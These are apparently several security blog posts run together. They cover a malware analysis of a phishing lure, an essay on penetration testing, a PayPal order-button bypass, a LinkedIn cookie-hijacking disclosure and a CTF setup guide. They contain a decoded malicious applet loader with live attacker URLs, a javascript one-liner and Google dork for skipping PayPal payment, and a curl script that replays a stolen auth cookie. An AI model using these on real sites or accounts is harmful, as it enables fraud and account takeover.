NOTE: All links have been appended with ‘non-clickable’ suffix “hxxp://” to prevent mistaken clicks.

Someone posted this link (hxxp://pastebin.com/dRGHt7hy) on a tweet. On checking, it was a list of URLs (actually single URL pasted multiple times – a sign of desperation),

1. hxxp://tinyurl.com/saw87hujnworeg
2. hxxp://tinyurl.com/saw87hujnworeg
3. hxxp://tinyurl.com/saw87hujnworeg
4. hxxp://tinyurl.com/saw87hujnworeg
   9954 credit card numbers

It states this link has 9954 credit card numbers. The first malicious hint is – Why not posting it directly rather than pasting the same link 4 times in an entry.

Next, this is too much of a luring target; so walk safe. So I opened the link in Malzilla (hxxp://malzilla.sourceforge.net/) a malware hunting tool. I disabled the auto-redirect. The link "hxxp://tinyurl.com/saw87hujnworeg" redirected to "hxxp://212.95.43.243/jdb/inf.php?id=0b740ebcc2abbc5512c4875a0f74965b" which opened as text fields with scripts. The file contained only a ‘doubtful’ script with some headings and titles.

Here is the only important script contained within the page. Let’s do the analysis.

This script if too complex to understand due to large variable names, so lets first change the variable names to shorter versions for better understanding. Here is the modified script with short variable names without changing the logic and working of it.

Now, it is easy to understand the logic and working of the script. First, let us decode the setTimeout and document.write fields. They look like Base64 Encoded so, let’s try to decode them. The encoded strings are,

1. QWRvYmUgRmxhc2ggbXVzdCBiZSB1cGRhdGVkIHRvIHZpZXcgdGhpcywgcGxlYXNlIGluc3RhbGwgdGhlIGxhdGVzdCB2ZXJzaW9uIQ==
2. aHR0cDovLzIxMi45NS40My4yNDMvamRiL2xpYi9hZG9iZS5waHA/aWQ9MGI3NDBlYmNjMmFiYmM1NTEyYzQ4NzVhMGY3NDk2NWI=
3. DQoJCTxhcHBsZXQgd2lkdGg9IjBweCIgaGVpZ2h0PSIwcHgiIGNvZGU9IlNpdGVMb2FkZXIuY2xhc3MiIGFyY2hpdmU9Imh0dHA6Ly8yM
   TIuOTUuNDMuMjQzL2pkYi9saWIvamF2YS9saXZlcy8wYjc0MGViY2MyYWJiYzU1MTJjNDg3NWEwZjc0OTY1Yi5qYXIiPg0KCQk8cGFyYW
   0gbmFtZT0id2NaUE4iIHZhbHVlPSJodHRwOi8vMjEyLjk1LjQzLjI0My9qZGIvbGliL2xvYWQucGhwP2lkPTBiNzQwZWJjYzJhYmJjNTU
   xMmM0ODc1YTBmNzQ5NjViIj4NCgkJPHBhcmFtIG5hbWU9InY4VE9YIiB2YWx1ZT0ic2V0dXAuZXhlIj4NCgkJPHBhcmFtIG5hbWU9Ikxl
   Z3ltIiB2YWx1ZT0id3d3LmRvZ3NjYXN0LmNvbSI+DQoJCTxwYXJhbSBuYW1lPSJNcEJERyIgdmFsdWU9IkFQUERBVEEiPg0KCQk8L2Fwc
   GxldD4=

Decoded strings are,

Adobe Flash must be updated to view this, please install the latest version!

1. hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b
2. <applet width="0px" height="0px" code="SiteLoader.class"
3. archive="hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar">
   <param name="wcZPN" value="hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b">
   <param name="v8TOX" value="setup.exe">
   <param name="Legym" value="www.dogscast.com">
   <param name="MpBDG" value="APPDATA">
   </applet>

The first decoded string has been set to entice the victim to click installing the ‘latest version’ of flash via their malicious link. So, we can see it will again issue a GET request to the following links,

1. hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b
2. hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar
3. hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b

And parameters are,

1. name="wcZPN" value="hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b"
2. name="v8TOX" value="setup.exe"
3. name="Legym" value="www.dogscast.com"
4. name="MpBDG" value="APPDATA"

Let us know access these URLs.

1. First I accessed the adobe.php URL (hxxp://212.95.43.243/jdb/lib/adobe.php?id=0b740ebcc2abbc5512c4875a0f74965b) via Malzilla and it downloaded a file "Adobe-Flash_WIN.exe" on my system. The size of this file is approx 1.16 Mb. This file when scanned via VirusTotal had the catch rate of 2/42 anti-malware products. Now, this is scary. I didn’t get a chance to do the run time analysis of this file, but yes will post it in the next blog.
2. On accessing the second URL (hxxp://212.95.43.243/jdb/lib/java/lives/0b740ebcc2abbc5512c4875a0f74965b.jar) it downloads a JAR file "0b740ebcc2abbc5512c4875a0f74965b.jar". This file when extracted results in the "META-INF" directory and "SiteLoader.class" file. The contents of META-INF includes,
   1. JUBUHUSE.DSA
   2. JUBUHUSE.SF
   3. MANIFEST.MF
3. Now let’s analyze the third URL load.php (hxxp://212.95.43.243/jdb/lib/load.php?id=0b740ebcc2abbc5512c4875a0f74965b) via Malzilla. When accessed, this link downloads a "setup.exe" file on the host. This file is the same as the previous file as per the SHA56 hash "cb3869fa81086e4f91a61663ccac100f5099ccf4564a971f955f1a61d37aecf5".

This is a brief analysis of a phishing link, which started via twitter as a PASTEBIN link, and made its way to reach your system through various files.

Vulnerabilities are increasing by leaps and bounds and any industry – technical or non-technical has to grow its security in sync or else, it is highly vulnerable and lucrative target. There is news of data loss, breaches every now and then. A rough estimate of the growth of vulnerabilities (as reported) over last decade (1995-2008) is shown in Figure 1. This accounts to vulnerabilities as reported, wherein there are hundreds of active (non-reported or un-patched) vulnerabilities floating underground which are in the hands of money driven and black hat profit driven attackers.

This exponential growth in vulnerabilities and ease in exploitation with automated kits demands the security to be on the tows. Every time the topic of information security is discussed, it has to be related to three of its key pillars – Protection, Detection and Response (Figure 2). These pillars, if strengthened well, can lower the chances of any known vulnerabilities be exploited in your network. To keep the security on its toes and its top notch maintenance, a client has to consider a penetration testing engagement to verify the security controls and validate response timings. So, what is Penetration testing all about?

Penetration Testing (or PT) is a widely used term with a broad meaning. It is generally referred to as a method to evaluate the security posture of a network, system or a device by simulating an attack or hacker’s activity. Though it is very much conjugated with Vulnerability Management (or VM) but there is a difference in their application and implication. While VM is commonly a part of any PT or risk assessment, but on a general note PT has more to do with active exploitation of the resources in scope, where in VM has to deal with the identification and quantification of vulnerabilities but not their exploitation. Overall a PenTest provides assessment support on all these pillars – verifies the security controls to check if they can be bypassed, and verifies the log, monitoring and alerting systems.

We are living in an era where cyber war and cyber-attacks are no more fictional plays. Even cyber espionages are also a part of controversial theories and discussions. We have hundreds of portals with security feeds, malware news and recent vulnerabilities available online. But are all these news, podcasts and blogs important for your business? You have deployed a number of software and devices in your network and you specifically need a risk assessment report thatcan cater to your requirements and technology setup instead of all the white papers shouting of exploitable applications which are not even installed inside your enterprise perimeter. An enterprise PT report usually has three main sections as shown in Figure 3, customized to the enterprise business model.

Each of these sections can be further categorized into sub topics as per application/network setups, security controls, technicalities/processes and compliance terms & conditions etc. On a short note the background information refers to the type of business the client is involved into. The main reason for this is to prioritize the severity ratings and provide remediation methods that can suite his IT and business models. Similarly the discovery phase of the report includes the network architecture, application/host details or physical/virtual address space information and this helps in determining the scope of the Penetration Testing that is to be carry forward. According to the findings of this discovery phase, the vulnerability identification/exploitation and remediation procedures will be attempted.

Following the planning phase, it’s the time to find something and assess it. To document the observations, vulnerability identification is considered to assess the in-scope resources and quantify possible bugs, gaps and vulnerabilities in the applications, software and/or devices. After confirming these findings and observations with various manual methods, tools and automated systems, the phase of vulnerability exploitation or infiltration comes into picture. This phase not only exploits the vulnerabilities but also confirms the impact of exploitation in accordance with the client’s business role and model. The key importance is that the exploitation of vulnerability may not be equally critical to two different business units with different priorities and offerings.

Finally the recommendation phase which includes the mitigation steps to render the vulnerability non-exploitable or even to patch the applications as per the availability of new versions, hotfix and other information. A step further under the recommendation, it can also include implementation of new services, devices or software to prevent the attacks on the client’s network and business enterprise.

With all these phases briefed, the common thing about them is – None of these approaches is a standard one, which means, with every client it differs; with every business model, the execution of these phases take a twist, and with every virtual/physical location of the client, there are changes and customizations needed. These are just the headings but the content highly depends on the client. And this makes it a business need, and offering worthy of an investment and understanding.

To facilitate a penetration testing, there are various automated vulnerability management solutions available in the market. Vulnerability Management (VM) solutions play in important part in automating the vulnerability assessment phase and documenting reports and graphs for the enterprise. These VM solutions have evolved and are pretty much single clicked operated these days. A brief layout of their market growth is projected in Figure 4. You feed the pre-requisites, and it will generate the final report with all the assessments done! It just is different for the sake that the vulnerability exploitation often will not be a part of it, and the security of the findings in the report will be based on the generic nature of vulnerability rather than on your business model.

The key dependency of a client’s response and approach depends on the understanding of the PT engagement in reference to his business and enterprise network. As per my experience, the clients (mostly businesses) usually have two modes of operations specific to investments in information security services,

1. Market Driven
2. Privacy Driven

Though there are always grey areas with a bird’s view, but on a granular level there are different key driving factors for a client to be concerned about its investments of funds – the flow towards development or towards its security. Some client may give a higher importance to its consumer base and their information, and some to their final products and services. There is a thin line, but surely it exists!

Market Driven Operations

The market driven approach is mainly regulated with the thought of being a step ahead of competitors, always focused to have all the high level certificates which can entitle their enterprise a top notch place in reference to available compliances, policies and standards. The key reason of such an approach is to acquire a market position and trust of its customers with valid proofs in ink.

To approach this client, the key criteria is – How this ‘pen-testing service’ will give it an edge over others? All the discussions revolve around it, and the presentation slides have the key motto of showing that this PT service is worth of providing them the boost (an advantage or a necessity). Irrespective of the client’s stand in the market, he is ready to opt and invest in sources which can give its customers a better trust and confidence in its product and services. And more importantly he can publicize it too!

In the discussions there are various questions, a client wish to confer about. The questions can range from the proficiencies of the PT team to the incoming challenges, pressure from the market, and security community etc.

Privacy Driven Operations

This is a section of clients which are actually concerned about the security, the network traffic and uptime/downtime of services. These clients invest in security, as they do not wish an attacker to compromise their servers/networks and are very much aware of the key worms, malware and attacks through news, and sometimes even via underground networks. These clients have people appointed to understand ‘technical terms’, findings and people who can cross question a pen-testing team.

To approach this client, the key criteria is – How is this ‘pen-testing service’ different from others? Even when the client is highly literate of its security, and has deployed security guidelines to its different business and development teams, what makes it important for it to invest in a third party penetration testing service. The presentation slides revolve around the technical superiorities of the team, and needs a detailed information intelligence to gather before ringing the bell.

During the kickoff meetings or even the proposal presentation, the pen-testing team occasionally receive ‘curious’ questions from the customer. Most of them point to a fundamental question – How to be sure that your team (PT team) falls in the league of ‘good’ guys? Even though it’s obvious to any information security firm, but can raise an eyebrow if the firm has a one liner approach towards information security in their corporate policy but has no knowledge of it. Even when you are technically sound, you have to prove that the pen-testing will not create any mess at the customer end, and more importantly, how this engagement report in all proportions, will be beneficial for the client. There are legal contracts to be signed and all the important paper work performed, but convincing a ‘non-technical’ client about the benefits of PT is the most challenging part.

These days, vulnerability management solutions also face restraints from the industry. Some of such restraints are listed in Figure 5.

I will share one such experience with a client. This client is in health care business but for confidentiality reasons, and scope of this article lets’ not dive into its location and name. Our team scheduled an appointment with the MD of this firm and proposed the need and requirement of a full-fledged PT engagement. Now the foremost step before you walk-in to any customer is to have thorough background knowledge including nature of business, locations, data criticality, online foot print etc. We were not dealing with the compliance checks or audits and were a technical team to propose & perform a PT engagement. To strengthen our proposal, we had already gathered enough information about the cracks in their security observing their flow of work and via different sources. The firm’s MD and some other members with professed ‘security knowledge’ had a raised eyebrow as soon as we presented our synopsis of the complete plan before digging into the in-depth discussions.

The four (4) key questions were,

Q1. Why do we need a PenTest when we never have been breached in the past and have a good track record in security?

A1. The reason that you have not been breached in the past doesn’t quantify and insure security for the future. There can be other possibilities such as,

• You have been breached but are still unaware of it as the attacker just copied the information, without altering any document.
  A PT assignment may help you find traces of such a breach.
• You have not been breached because the attackers couldn’t find any golden egg in your basket or are unaware of your worthy existence. With your expansion, and bright business prospects you can be the next target.
  A PT report will document such holes before anyone else does!
• It may not be an external breach, but internal employee can be trading information with external entities. How will you regulate and verify privilege escalations?
  A PT report will document gaps in security policies and configurations to the management.

Q2. We have a secured facility with all kinds of physical and virtual controls, then why do we need this kind of assessment?

A2. Physical and virtual controls are appreciable but how often there are checks that people are following it. Users and employees adhere to these checks and have not devised a way around to bypass them. To deploy and to maintain are two different realms of security, and individuals if not checked and educated/trained on time usually tend to look for short-cuts.

• How do you maintain the ID cards, and to ensure that no duplicate card be issued without proper documentation and deactivation of previous record.
  PT report will also include if there are any duplicate logs or possible intrusions using the same electronic key
• How do you maintain the permission levels for different individuals in the firm where a certain group is restricted to certain facility?
  PT report will contain the permission levels and possible breaches if there is a firm policy. And we can also provide guidance in documenting such policy.

Q3. The customers have access to their records with a password protected online portal, so no one else can get hold of their information.

A3. Password security is much more complex than it is perceived by the firms and there are many such aspects which need to be considered in accordance with passwords,

• How to maintain the complexity of passwords? Does the online portal enforce keeping strong alphanumeric passwords of a minimum permissible length? If they are not met, any weak password is as simple as an open door to break.
  PT assignment will assess the security of such controls and permissible passwords and complexities.
• How to make sure the session tokens and/or cookies are random and generated and/or expired in due course of time. If not managed and randomized properly, passwords are of no use as anyone can validate anyone’s session.
  A PT report will document all such findings and possible brute-force attacks and randomization of such values
• Even if all the password regulations are met, complexities and randomization of cookies and session is dealt with, there are literally hundreds of checks and vulnerabilities in an ill-coded or obsolete application that can let an attacker breach and steal your resources
  A PT report will present all such findings, application’s vulnerability and will also provide the ways to mitigate them

Q4. We have an anti-malware solution, firewalls etc. deployed and no-one has the right to tinker with it except a third party security vendor. We are very safe!

A4. Anti-malware solution Firewalls, IDS/IPS are as good as a soldier with shields and ammunitions but everything depends on how he is trained to protect.

• How to configure the firewall to best suite your business needs, and network traffic requirements
  PT report helps in analyzing the configuration of the servers, devices (firewall/IDS/IPS or UTM), and clients to the best of hardened security.
• How to make sure that the configurations performed by the administrator are in best results to your business
  PT report helps find the gaps against popular guidelines, CIS benchmarks or firm’s global policies

I am sure that these are the kind of questions asked by individuals who are oblivious to security incidents and real world case studies. They hide their resources and confide on the security under the shadows of the past. With due respect, we explained the answers to all such queries focusing on the needs of security assessments.

But some customers have a very different set of reasons ‘against’ penetration testing,

R1. We already know where everything is broken.

R2. If you tell us what’s wrong, we’ll have to fix it.

R3. We don’t have anything that hackers want.

R4. We’re too small to matter.

R5. We haven’t fixed the things you found broken last time.

R6. Our employees don’t know how to do bad things.

While these reasons seem to be challenging enough to refute by any pen-tester, they are certainly not! Any security team can negate these reasons with proper homework and case studies.

[R1] Knowing that you (customer) are broken doesn’t help you in the knowledge on how to mend the cracks. There are two approaches,

• Band-Aid Approach which means temporary mending of a crack in security
• Hardened Approach which reflects strong solution to fix the gap

A pen-test report can help you with the recommendations and mitigations steps on the gaps that you already are aware about.

[R2] On the other hand, if you are afraid that you will have to fix it, then it’s anytime better than an attack in future that might go beyond your fixing abilities.

[R3] What hackers’ want, is only at their discretion. He instead of attacking you for some confidential data may only be using your computational power to perform DOS attacks or installing bots on your corporate network etc. You never know a real hacker’s intention, until unless you experience it on your recourses.

[R4] Even a chain of house hold computers if compromised can be leveraged to bring big enterprises on their feet in the era of cyber war. Nothing is too small to matter in this world when you have computational power, access to internet, and revenue generating model.

[R5] That’s a bad approach to security! If you haven’t fixed the previous gaps identified, you might already have been victims to attacks or at worst inducing fresh vulnerabilities. The attack surface increases exponentially over a period of time, for the reason of public disclosures and exploits readily available of old/obsolete vulnerabilities. What initially required a skilled hacker to perform, if not fixed, can be exploited by a script kiddie.

[R6] Human is the weakest link in the security and irrespective of all the security guidelines and procedures you train the employees on, they are no match for an individual’s curiosity.

Clients often have a question revolving around the PenTest report categorization. There are clients that leave the format of the report to the vendor performing PenTest or sometimes the clients supply their own template. PenTest is often regarded for providing a bulky report that clients tend to avoid paying attention to. This report can be further tweaked in different sections and sub-titles to project effective spotlight to critical items and vulnerabilities. Some of the sections that can come handy to a client are the management overview or summary where a PenTest report can have graphs, pie charts to show the observations. Then in the body section, a client should essentially see the severity ratings either on the basis of vulnerability exploitation (remote/local or ease), or exposure to its resources in reference to the findings in the network. This categorization and display of the results aids the client to understand the priority in fixing the vulnerabilities and the gaps.

All in all, a PenTest engagement is very much beneficial for the client or an enterprise, if carried out and offered with good presentations, graphs and charts. A client should consider fixing these vulnerabilities before an attacker exploits it. Moreover, these PT reports aid the client in the assessment of their network and security.

Farhan,

Thank you for the notification regarding the vulnerable button implementations on merchant sites.  At this time, we are actively investigating the noted issues within our customers implementations.  All issues will be handled professionally and quickly.  Again we appreciate you bringing this to our attention.

Thank you,

PayPal Site Security

(sitesecurity@paypal.com)

JavaScript is so simple. It just redirect the user by fetching the download page from website’s source code. The download link is in hidden input tag and the name attribute is "return".

javascript:top.location=document.getElementsByName(‘return’)[0].value;javascript:void(0);

Moreover the JavaScript is floating around various blogs and forums. Apart from them a lot of video tutorials are uploaded on YouTube. The infected websites can easily be searched by this Google dork,

"this order button requires a javascript enabled browser"

Google lists a whopping 1,390,000 results. So this number of sites are at risk & easy to be exploited. The internet is flooding with this vulnerability & it’s exploit, but the biggest question is that the PayPal, which is considered the most secure payment service doesn’t get attention till now about this theft.

This vulnerability and post has been submitted by Farhan Ghumra , a computer engineer student from Rajkot, India.

Disclaimer

This blog-post is provided to you as-is basis. The opinions expressed in this post are not those of website/blog owner, Rishi Narang or any other author except the one explicitly mentioned in this blog-post. While this weblog makes every effort to ensure that the contents within are accurate and complete, this weblog makes no representation or warranty, whether express or implied, as to the operation, integrity, availability or functionality of this weblog or as to the accuracy, completeness or reliability of any information on this weblog. Any person who accesses this weblog or relies on the information contained in this weblog does so at their own risk. All data and information provided on this weblog is for informational purposes only.

[*] This bypass technique is already in the wild, and people have written blogs and have shared videos on it. It may not be the first discovery here, but as per the author Farhan, he shares & quotes this discovery as his own research, a little late in time though!

LinkedIn is a business-oriented social networking site. Founded in December 2002 and launched in May 2003, it is mainly used for professional networking. As of 22 March 2011, LinkedIn reports more than 100 million registered users, spanning more than 200 countries and territories worldwide.

There exists multiple vulnerabilities in LinkedIn in which it handles the cookies and transmits them over SSL. This vulnerability if exploited, can result in hijacking of user accounts, and/or modifying the user information without the consent of the profile owner.

Executive Summary

Name: LinkedIn SSL Cookie Vulnerability (SESSION and AUTH TOKEN)

Severity:  High

Host(s): https://www.linkedin.com and http://www.linkedin.com

Author/Contact Person: Rishi Narang  ( Twitter: @rnarang | Mail: rishi[at]wtfuzz.com | LinkedIn: http://in.linkedin.com/in/rishinarang )

PS: I received some comments recently through different mediums & channels, so, if you need any details or clarifications please contact me through Twitter and/or Mail address as mentioned above.

Background Information

LinkedIn can be accessed over HTTPS and HTTP connections. The sign-in pageif accessed on HTTPS, redirects you to HTTP on successful authentication. By default the welcome page stores the following important cookies (highlighting only the SESSION and AUTH TOKEN in scope),

After successful login (over HTTPS or HTTP), the value of cookies should change, specifically, the JSESSIONID and AUTH_TOKEN. The SESSIONID remains the same no matter what or if the browser exits, the server sends a new SESSIONID. Now, lets see how leo_auth_token changes after successfully authentication and login …

JSESSIONID

Ideally this cookie is used for tracking session and thus it has an ID generated to track that session in the application and server logs. As per information available online, JSESSIONID cookie is created/sent when session is created. Session is created when your code calls request.getSession() or request.getSession(true) for the first time. If you just want get session, but not create it if it doesn’t exists, use request.getSession(false) — this will return you a session or null. In this case, new session is not created, and JSESSIONID cookie is not sent. This also means that session isn’t necessarily created on first request; you and your code is in control when the session is created.

Example: JSESSIONID="ajax:2960939797451683300" . And, the syntax for this session id is –> ajax:<19 digit code>

LEO_AUTH_TOKEN

There is not much information available on this cookie in my knowledge, but I could relate some sections as following.

Example: leo_auth_token="LIM:118607520:a:1305884679:b42ee51919add89581a0b49ebe1e420dbb93a468"  (Only highlighted key reference available below)

1. 118607520: This is the User ID. It can also be verified when viewing someone’s profile. It traverses in the traffic unencrypted and is also available in GET requests.
2. 1305884679: This is ‘perhaps’ (guess analysis) the user login counter (global). I am not sure if it resets or its just progressive but, surely with every login it increments by 1. Special thanks to Julio for clarification that this is a Unix Timestamp of the time user logs in. (Refer: http://www.onlineconversion.com/unix_time.htm). This Unix Timestamp will also decide the expiry date of the cookie. (1 year from this time which is too much for an attacker)
3. b42ee51919add89581a0b49ebe1e420dbb93a468: This is a approx. 40 character long hexadecimal string. It can be smaller or larger and is not fixed in length. I am still working if this can be decrypted or can be related/tied to some part of the session.

In general these two (2) cookies are enough to verify a session, and both the cookies have to be defined in "quotes" and here is a sample POST request (used in LinkedIn status update) for reference,

POST http://www.linkedin.com/share?submitPost= HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: leo_auth_token="LIM:118607520:a:1305884679:b42ee51919add89581a0b49ebe1e420dbb93a468";JSESSIONID="ajax:2960939797451683300"

ajax=true&postText=TEST_STATUS&postVisibility=EVERYONE&csrfToken=ajax:2960939797451683300

This request results in changing the User Status on the profile page. So, what and where is the vulnerability here?

Vulnerability Information

There are two (2) vulnerabilities in reference to the cookies (communication channel and session lock) as explained below,

1. SSL cookie without secure flag set

It means that all the cookies including the JSESSIONID and LEO_AUTH_TOKEN are available in plain text over unencrypted channel of communication. These cookies appear to contain session tokens, which may increase the risk associated with the authentication procedure. One should review the contents of the cookies to determine their function and the need for encryption.If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie’s scope.

Impact

An attacker may be able to perform an MITM attack, and thus capture these cookies from an established  LinkedIn session. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form https://www.linkedin.com to perform the same attack.

Workaround

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

2. Cookie Expiration & Session Handling

It means that the cookie for an authenticated session is available even after the session has been terminated or way beyond the date of expiry (instead compared to session logout, it is valid for 1 year). There are examples where cookies are accessible to hijack authenticated sessions. And these cookies are months old (literally). As a result, in just 15 minutes, I was successfully able to access multiple active accounts that belong to individuals from different global locations. They would have login/logged out many a times in these months but their cookie was still valid.

Even though the cookie expiry date is mentioned still the cookies are valid. Why does LinkedIn keeps the cookie active even if the user has "logged out" and closed the session? Worse, when the same has been done a hundred times!

Impact

As a result of valid cookies, an attacker can sniff the cookies from clear-text session (explained above), and then use it to authenticate its own session. He can then compromise and modify the information available at the user profile page.

Workaround

The expiry date/time should be locked with either a fixed ‘period’, or user’s session logout or IP etc. In absence of a fixed and reasonable expiration time period (1 year is not reasonable/acceptable), a cookie is active even after months and year of its authentication. Define expiration as the end of session or till the JSESSIONID is valid.

Curious case of JSESSIONID

As I mentioned about the JSESSIONID above, ideally the session should be mapped with this ID, and if tampered with, should disconnect the session. At least, I would believe it to work this way! But now, even if you change the JSESSIONID to ajax:0000000000000000000 (ajax followed by 19 digits) the session is still valid and the server continues accepting requests with this JSESSIONID.

Even if it has nothing to do with session but only tracking, tinkering with SESSION id surely will dangle the tracking at the server end.

LinkedIn Status Update Bash Script (Download Here)

Here is a small script to update the status at the LinkedIn profile page through command-line. It takes the input as "LIM:XXXX" cookie value and new status update.

#!/bin/bash

clear
echo ""
echo " =================================================="
echo " #          LinkedIN Status Update Script         #"
echo " #          —————————–         #"
echo " #      Author: Rishi Narang (rishi@wtfuzz.com)   #"
echo " #               — WWW.WTFUZZ.COM –             #"
echo " #                                                #"
echo " =================================================="
echo ""

echo -en " – Auth Cookie (Format – LIM:XXXX): "
read LIM

echo -en " – New Status: "
read UPDATE

curl -s -b "leo_auth_token=\"${LIM}\";JSESSIONID=\"ajax:0000000000000000000\"" -d\
"ajax=true&postText=$UPDATE&postVisibility=EVERYONE&csrfToken=ajax%3A0000000000000000000"\
http://www.linkedin.com/share?submitPost= -o linKIN.tmp

echo ""
OUT=`cat linKIN.tmp | grep "SUCCESS" | wc -l`
DUP=`cat linKIN.tmp | grep "DUPLICATE" | wc -l`

if [ $OUT -eq 1 ]
then
        echo -e "MSG: Status updated successfully!\n"

elif [ $DUP -eq 1 ]
then
        echo -e "ERROR: Duplicate Status! Please enter a new status.\n"
        exit
else
        echo -e "ERROR: Please try again later.\n"
fi
rm -rf linKIN.tmp
echo ""

#EOD

Pretty intriguing! Isn’t it? Anyways, I read the forum (only 1 informative post till date) and regular here and there stuffs. It requires (recommends) OpenVPN to connect to its servers. They have configuration files available on their website to connect pwn0 server. Once you create your register, you can browse the configuration archive here (ZIP) and here (TAR.GZ). Here is my configuration andsmall hands-on guide on how I performed the same,

Downloaded and installed OpenVPN for my Ubuntu using,

apt-get install openvpn

After installing the same, I played with it a while to look for configuration options and file imports etc. I was wondering how to change the default options, and then searching for the files on it for some minutes, I figured out the configuration directory (unzip the config file downloaded from pwn0) ideally can be placed at /etc/openvpn/. So, the structure looked like,

This structure shows the 6 files supplied in the archived package from pwn0. These files contains the certificates (ca.crt, <username>.crt) and key file (<username>.key) together with 3 configuration settings’ file (pwn0.conf, pwn0.ovpn, pwn0.ovpn.udp). To start OpenVPN with the ‘pwn0 configuration’, issue the following command:

[reboot:/etc/openvpn/config]# openvpn – – config pwn0.conf

After connecting to the pwn0 server, make sure you can see the tunnel IP in your list as 10.225.0.* and can ping the fellow IP addresses. If yes! then bravo, you are done with all the configurations. Time to play some tricks now. Here are some files (bash scripts) which should be executed from the same console of VPN connection (I used linux, and so scripts are developed in BASH).

List of Scripts,

1. uson.sh – A script that helps you find the online users to help you plan your strategy. The script when executed creates a new file by the name "uson" and saves the usernames in it. [ Script Code: View | Download ]
2. ipon.sh – A script that finds the IP addresses of the users that are connected to the pwn0 VPN. It creates a new file by the name "ipon" and lists the IP addresses in it. [ Script Code: View | Download ]
3. score.sh – A script that helps you perform one kind of attack where you access the URL: http://vpn.pwn0.com/score?user=<username> where ‘username’ is of any active online VPN user. This script does all the job automatically and takes the input as a Username File. Execute it as "./score.sh" [ Script Code: View | Download ]
4. rscore.sh – The same job as score.sh but scoring as root. (sorry, will update the script later.)

I am one day old in this CTF at pwn0.com so, will release other parts as and when I complete the levels :). Meantime, happy hacking to all and best wishes! Feel free to comment here for any suggestions or new techniques, or improvements.

PS: All these scripts are raw and have been created in some hours. Excuse me if there are better ways, but these are just home based cooking! *Not to be tested in production environments and random inputs*

Cheers!